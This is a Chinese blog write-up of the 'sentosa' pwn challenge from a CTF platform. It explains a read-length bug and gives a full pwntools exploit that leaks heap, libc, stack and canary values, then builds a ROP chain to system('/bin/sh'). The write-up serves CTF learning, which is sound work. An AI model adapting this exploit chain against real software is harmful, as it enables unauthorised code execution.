攻防世界PWN之sentosa题解

最新推荐文章于 2024-05-05 15:50:26 发布
最新推荐文章于 2024-05-05 15:50:26 发布
阅读量769 收藏
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: segmentfault 安全 linux ubuntu 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104287063
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Sentosa

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,一个经典的增删改查程序

经过分析,程序中不存在堆溢出漏洞,唯一的漏洞在这里

如果a20,就会造成输入长度无限制,因为0-1变成-1,传给read,而read的size参数为无符号数,导致-1转换成无符号数,很大,可以无限制输入。

最终造成create函数里栈溢出,覆盖v6指针

如果a20,就会造成输入长度无限制,因为0-1变成-1,传给read,而read的size参数为无符号数,导致-1转换成无符号数,很大,可以无限制输入。

最终造成create函数里栈溢出,覆盖v6指针

而v6指针是什么呢?

V6是堆指针,我们溢出后覆盖成其他地址被保存到global_heaps里面,我们可以实现任意地址读写

我们要泄露libc地址,获取需要的函数,因此,我们需要利用unsorted bin,那么就需要伪造unsorted bin范围的chunk。当我们伪造好了fake_chunk,我们就要想办法free掉它,这就需要利用栈溢出覆盖v6指针为fake_chunk的地址,这样,我们下一次就能free它了。因此,我们首先得泄露堆地址。

由于不存在UAF,因此,我们利用栈溢出覆盖v6指针为释放后的chunk的地址,然后show就可以泄露出堆地址了。

由于输入的size0会造成无限输入,因此我们需要用’\n’结束输入,而\n会被替换成’\x00’,也就是说,我们最先不知道堆地址的情况下,想要泄露堆地址,就得使用低1字节覆盖。而低1字节注定为0,那么,也就是我们最终会让v6指向chunk0,那么,我们就得让chunk0里留下堆指针才行,因此,我们先释放其他chunk,将chunk0的释放放到后面,由于fastbin采用头插法链接chunk,因此在chunk0的fd域就会留下指针

  1. #0  
  2. create(0x3,'a'*0x2)  
  3. #1  
  4. create(0x3,'b'*0x2)  
  5. #2  
  6. create(0x3,'c'*0x2)  
  7. #3  
  8. create(0x3,'d'*0x2)  
  9. #4  
  10. create(0x3,'e'*0x2)  
  11.   
  12. delete(1)  
  13. delete(0)  
  14. delete(2)  
  15. #覆盖堆指针低位为0,使得它指向chunk0chunk0里保存着堆指针,可以供我们泄露  
  16. create(0,'a'*0x5A) #chunk2重新申请回来  
  17. #泄露堆地址  
  18. show()  
  19. sh.recvuntil('Capacity: ')  
  20. h = int(sh.recvuntil('\n',drop = True))  
  21. if h < 0:  
  22.    h = 0x100000000 + h  
  23. heap_addr = (0x55 << 4 * 8) + h << 8  
  24. print 'heap_addr=',hex(heap_addr)  

接下来,我们就要伪造unsorted bin范围的chunk了,为了能够free这个fake_chunk,我们还得精心构造,绕过程序中的这个检测

并且,空字节不会被写到堆里,因为程序中使用了strncpy,遇到’\x00’就会截断,因此,伪造这个fake_chunk需要精心考虑

如下,我们控制price0x1000,使得我们在这个chunk里伪造的fake_chunk正好满足程序的要求,即fake_chunk + *fake_chunk + 5 = 1

  1. #1,size = 0x20 + 0x80 = 0xA0  
  2. fake_chunk = 'd'*4 + '\xA1'  
  3. #控制price的值,使得符合位置为1,绕过检查  
  4. create(0xB,fake_chunk,0x10000)  
  5. #2  
  6. create(0x59,'f'*0x58)  
  7. #5  
  8. create(0x59,'g'*0x58)  
  9. #6  
  10. #覆盖堆指针低位为0,使得它指向我们伪造的fake_chunk  
  11. create(0,'a'*0x5A + p64(heap_addr + 0xC0))  
  12. #fake_chunk放入unsorted bin  
  13. delete(6)  
  14. #覆盖堆指针低位,使得它指向我们伪造的fake_chunk,因为此时fake_chunk里面有libc指针  
  15. create(0,'b'*0x5A + p64(heap_addr + 0xC0-4)) #6  
  16. #泄露libc指针  
  17. show()  
  18. sh.recvuntil('Project: ggggggggggggggg')  
  19. sh.recvuntil('Project: ')  
  20. main_arena_xx = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))  
  21. malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)  
  22. libc_base = malloc_hook_addr - malloc_hook_s  
  23. environ_addr = libc_base + environ  
  24. system_addr = libc_base + system_s  
  25. binsh_addr = libc_base + binsh_s  
  26. pop_rdi_addr = libc_base + pop_rdi  
  27. print 'libc_base=',hex(libc_base)  
  28. print 'environ_addr=',hex(environ_addr)  

现在,我们还差canary了,我们只要有了canary的值,就可以用栈溢出做ROP了。那么,我们需要泄露栈地址,而libc中的environ变量保存着栈地址,我们利用栈溢出把v6指针覆盖为environ的地址后show,就能得到栈地址。然后,我们计算出canary存放的位置,用同样的方法泄露canary后栈溢出ROP即可getshell。

  1. #同理,接下来,我们覆盖堆指针为environ_addr附近,这样我们可以泄露栈里面的内容  
  2. #需要注意的是,由于有了unsorted bin,我们新申请的块会从unsorted bin里面切割,导致show的时候发生错误  
  3. #因此,我们delete(3),让我们申请的块直接拿fastbin里面的chunk3来,而不从unsorted bin里面切割  
  4. delete(3)  
  5. create(0,'b'*0x5A + p64(environ_addr-4))  
  6. show()  
  7. sh.recvuntil('Project: fffffffffffffff')  
  8. sh.recvuntil('Project: ')  
  9. stack_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))  
  10. print 'stack_addr=',hex(stack_addr)  

我们最终的exp脚本

#coding:utf8
from pwn import *

sh = process('./sentosa')
#sh = remote('111.198.29.45',36218)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
malloc_hook_s = libc.symbols['__malloc_hook']
#借助environ,我们可以泄露栈地址
environ = libc.symbols['environ']
system_s = libc.sym['system']
binsh_s = libc.search('/bin/sh').next()
pop_rdi = 0x21102

def create(size,name,price=0, area=0, capacity=0):
   sh.sendlineafter('5. Exit','1')
   sh.sendlineafter('Input length of your project name:',str(size))
   sh.sendlineafter('Input your project name:',name)
   sh.sendlineafter('Input your project price:',str(price))
   sh.sendlineafter('Input your project area:',str(area))
   sh.sendlineafter('Input your project capacity:',str(capacity))

def show():
   sh.sendlineafter('5. Exit','2')

def delete(index):
   sh.sendlineafter('5. Exit','4')
   sh.sendlineafter('Input your projects number:',str(index))
#0
create(0x3,'a'*0x2)
#1
create(0x3,'b'*0x2)
#2
create(0x3,'c'*0x2)
#3
create(0x3,'d'*0x2)
#4
create(0x3,'e'*0x2)

delete(1)
delete(0)
delete(2)
#覆盖堆指针低位为0,使得它指向chunk0,chunk0里保存着堆指针,可以供我们泄露
create(0,'a'*0x5A) #chunk2重新申请回来
#泄露堆地址
show()
sh.recvuntil('Capacity: ')
h = int(sh.recvuntil('\n',drop = True))
if h < 0:
   h = 0x100000000 + h
heap_addr = (0x55 << 4 * 8) + h << 8
print 'heap_addr=',hex(heap_addr)
#1,size = 0x20 + 0x80 = 0xA0
fake_chunk = 'd'*4 + '\xA1'
#控制price的值,使得符合位置为1,绕过检查
create(0xB,fake_chunk,0x10000)
#2
create(0x59,'f'*0x58)
#5
create(0x59,'g'*0x58)
#6
#覆盖堆指针低位为0,使得它指向我们伪造的fake_chunk
create(0,'a'*0x5A + p64(heap_addr + 0xC0))
#fake_chunk放入unsorted bin
delete(6)
#覆盖堆指针低位,使得它指向我们伪造的fake_chunk,因为此时fake_chunk里面有libc指针
create(0,'b'*0x5A + p64(heap_addr + 0xC0-4)) #6
#泄露libc指针
show()
sh.recvuntil('Project: ggggggggggggggg')
sh.recvuntil('Project: ')
main_arena_xx = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
environ_addr = libc_base + environ
system_addr = libc_base + system_s
binsh_addr = libc_base + binsh_s
pop_rdi_addr = libc_base + pop_rdi
print 'libc_base=',hex(libc_base)
print 'environ_addr=',hex(environ_addr)
#同理,接下来,我们覆盖堆指针为environ_addr附近,这样我们可以泄露栈里面的内容
#需要注意的是,由于有了unsorted bin,我们新申请的块会从unsorted bin里面切割,导致show的时候发生错误
#因此,我们delete(3),让我们申请的块直接拿fastbin里面的chunk3来,而不从unsorted bin里面切割
delete(3)
create(0,'b'*0x5A + p64(environ_addr-4))
show()
sh.recvuntil('Project: fffffffffffffff')
sh.recvuntil('Project: ')
stack_addr = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
print 'stack_addr=',hex(stack_addr)
#定位canary的位置,注意的是在canary前面那个地址要至少有3字节0,和canary的最后一字节0,组成4字节数据,代表chunk的大小为0
#不然要出错,因此,我们找到了这个地方有一个符合的
canary_addr = stack_addr - 0x130
print 'canary_addr=',hex(canary_addr)
#用同样的方法泄露canary
delete(4)
create(0,'b'*0x5A + p64(canary_addr-3))
show()
sh.recvuntil('Project: fffffffffffffff')
sh.recvuntil('Project: ')
sh.recvuntil('Project: ')
canary = u64('\x00' + sh.recvuntil('\n',drop = True))
print 'canary=',hex(canary)
#栈溢出,构造ROP
payload = 'a'*0x68 + p64(canary) + p64(0)*5 + p64(pop_rdi_addr) + p64(binsh_addr) + p64(system_addr)
create(0,payload)

sh.interactive()
ha1vk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
level0 -- 攻防世界新手题
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
pwn周记 && environ && patchelf
最新发布
A13837377363的博客
05-05 206
这个标识符存在于libc中,保存当前程序的环境变量地址,也就是包含栈中的一些地址,可以通过打印environ中的内容获取栈的地址。之前为了图方便,一直使用clibc改变二进制文件的libc,但是这样改变会导致符号表没有导入。这样你在gdb的时候输入。然后在glibc-all-in-one中下载相应的libc,这样的指令去查询函数或变量位置是无效的。需要引入debug文件才能查询符号表。最好的做法是在先查询libc具体版本。这样就能查询各函数和变量了。打印exit_hook地址。最后直接引入ld和整体路径。
[BUUCTF-pwn]——wdb2018_guess (environ环境变量)
Y_peak的博客
04-06 1330
[BUUCTF-pwn]——wdb2018_guess 这个漏洞叫什么来着, 好像是stack smash, 具体就是主动触发canary保护来达到自己的目的. 这道题最后我也有一个小疑问, 这个程序为什么会莫名其妙执行三次. 嘶!!! 一个常见的保护开启NX canary RELRO 在IDA中看看, 那个buf就是我们要的flag 先主动触发一下canary看看会发送什么. 输出的是argv[0], 同时程序会再次执行,发现会重复执行三次. 思路 思路来了 利用主动触发canary保护, 调用**
environ泄露栈地址+orw+uaf
FUCKING12的博客
10-08 591
这个题开了沙箱,有uaf。利用思路:借助environ泄露栈地址,利用uaf将orw写到栈地址上。首先enviro泄露的栈地址在edi函数里面是rsp所指向的地址。然后,在edit执行leave前栈已经是我们想要的结构了。正如我们所看到了payload3那样。然后接下来就是ret到orw处。
hitb2017 sentosa writeup
weixin_30872733的博客
08-31 135
我都快忘了我还有个博客了。。。 这次有幸被XMAN夏令营选为代表去新加坡参加htib线下赛(其实由于太菜变成了新加坡5日游。。。),pwn题被虐哭,在此我要再次感谢一下BrieflyX大佬,要不是出了这道sentosa我们队就会面临一道pwn都做不出来的窘境。:) 这道题是一道很常规的题,没有什么骚套路,就是简单粗暴的栈溢出。不过由于开了PIE和canary,所以需要泄露堆地址、泄露...
PWN练习之环境变量继承
WateranFire的博客
09-07 1134
一、环境变量参数:       在Linux/Windows操作系统中, 每个进程都有其各自的环境变量设置。 缺省情况下, 当一个进程被创建时,除了创建过程中的明确更改外, 它继承了其父进程的绝大部分环境变量信息。 扩展的C语言main函数可以传递三个参数,除了argc和argv参数外,还能接受一个char**类型 的envp参数。envp指向一个字符串数组,该数组存储了当前进程具体的环境变
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
Pwn】fuzzerinstrospector(首届数字空间安全攻防大赛)
07-16
Pwn】fuzzerinstrospector 是首届数字空间安全攻防大赛中的一项挑战,这个比赛旨在测试参赛者在信息安全领域的技能,特别是针对软件漏洞的发现和利用能力。在这个特定的挑战中,参赛者可能需要使用模糊测试...
pwn-environment:使用docker的ctf-pwn环境
05-11
环境 使用docker的ctf-pwn环境
PWN-PRACTICE-BUUCTF-24
P1umH0的博客
09-09 217
PWN-PRACTICE-BUUCTF-24
_environ与ssp攻击
N1rvana的博客
02-21 1113
_environ 在Linux C中,environ是一个全局变量,它储存着系统的环境变量。 它储存在libc中 因此environ是沟通libc地址与栈地址的桥梁。 如图:即为一个程序中environ的具体信息: environ利用 通过libc找到environ地址后,泄露environ地址处的值,可以得到环境变量地址,环境变量保存在栈中,通过偏移可以得到栈上任意变量的地址。 ssp攻击 canary的各种利用方式中,有一种是通过 __stack_chk_fail函数打印报错信息来实现。 __stac
Linux:环境变量
ll1175555的博客
11-02 1482
环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数。环境变量通常具有某些特殊用途,通常具有全局特性,可以被子进程继承下去。
堆中获取地址和劫持执行流的方法
九层台
09-02 1977
栗子https://github.com/tower111/software.git 0x01获取栈地址 详细writeup:https://tower111.github.io/2018/08/30/ISG-babynote/ 原理:在fast bin是单链在内存中保存,在fd位置处会写入next chunk的地址,这个地址可以用来获取heap_base。 栗子:babynote 需要...
攻防世界PWN之interpreter-200题解
seaaseesa的博客
02-06 584
interpreter-200 这是一个befunge程序解释器,befunge程序的语法参考https://www.jianshu.com/p/ed929cf72312,还有官方的文档在https://esolangs.org/wiki/Befunge 另外本文参考国外的一篇,加以自己的理解,做了简化 https://uaf.io/exploitation/2016/09/05/Tokyo...
栈溢出技巧-中
蚁景网安学院
04-02 1136
基于报错类的栈保护canary这个值被称作金丝雀(“canary”)值,指的是矿工曾利用金丝雀来确认是否有气体泄漏,如果金丝雀因为气体泄漏而中毒死亡,可以给矿工预警。在brop中也提到过,...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值